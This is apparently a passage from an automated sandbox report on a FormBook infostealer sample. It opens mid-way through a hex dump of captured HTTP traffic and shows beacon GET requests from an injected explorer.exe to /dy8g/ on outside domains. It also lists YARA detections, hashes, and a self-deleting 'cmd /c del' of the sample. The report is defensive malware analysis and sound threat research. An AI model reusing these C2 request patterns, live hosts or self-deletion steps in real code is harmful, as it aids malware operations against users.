72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.649762103.138.88.1180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:44:09.256103992 CEST10427OUTGET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.okinawarongnho.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:09.556632996 CEST10427INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Thu, 22 Jul 2021 15:42:19 GMT
                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                  Content-Length: 203
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.649763162.241.62.5480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jul 22, 2021 17:44:14.927139997 CEST10428OUTGET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1
                                                                  Host: www.jorgeporcayo.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Jul 22, 2021 17:44:15.720453024 CEST10429INHTTP/1.1 200 OK
                                                                  Date: Thu, 22 Jul 2021 15:44:15 GMT
                                                                  Server: Apache
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  Retry-After: 86400
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Vary: Accept-Encoding
                                                                  Accept-Ranges: none
                                                                  Transfer-Encoding: chunked
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 6f 76 69 6d 69 65 6e 74 6f 20 70 65 72 73 6f 6e 61 6c 20 79 20 73 6f 63 69 61 6c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 55 6e 64 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 50 61 67 65 20 70 6c 75 67 69 6e 20 66 6f 72 20 57 6f 72 64 50 72 65 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 63 6f 6d 6d 6f 6e 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 6f 72 67 65 70 6f 72 63 61 79 6f 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 38 33 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74
                                                                  Data Ascii: 91c<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title> is under construction</title> <meta name="description" content="Movimiento personal y social" /> <meta name="generator" content="Free UnderConstructionPage plugin for WordPress"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:400,900"> <link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=3.83" type="text/css"><link rel="stylesheet" href="http://www.jorgeporcayo.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.83" type="text/css"><link rel="stylesheet" href="htt


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:10
                                                                  Start date:22/07/2021
                                                                  Path:C:\Users\user\Desktop\v8kZUFgdD4.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x400000
                                                                  File size:188889 bytes
                                                                  MD5 hash:57F3AE2842FFB5CEEA386D0B97A52818
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:17:42:15
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0x7ff6f22f0000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:42:34
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Imagebase:0x13e0000
                                                                  File size:29184 bytes
                                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  General

                                                                  Start time:17:42:38
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
                                                                  Imagebase:0x2a0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:17:42:39
                                                                  Start date:22/07/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff61de10000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >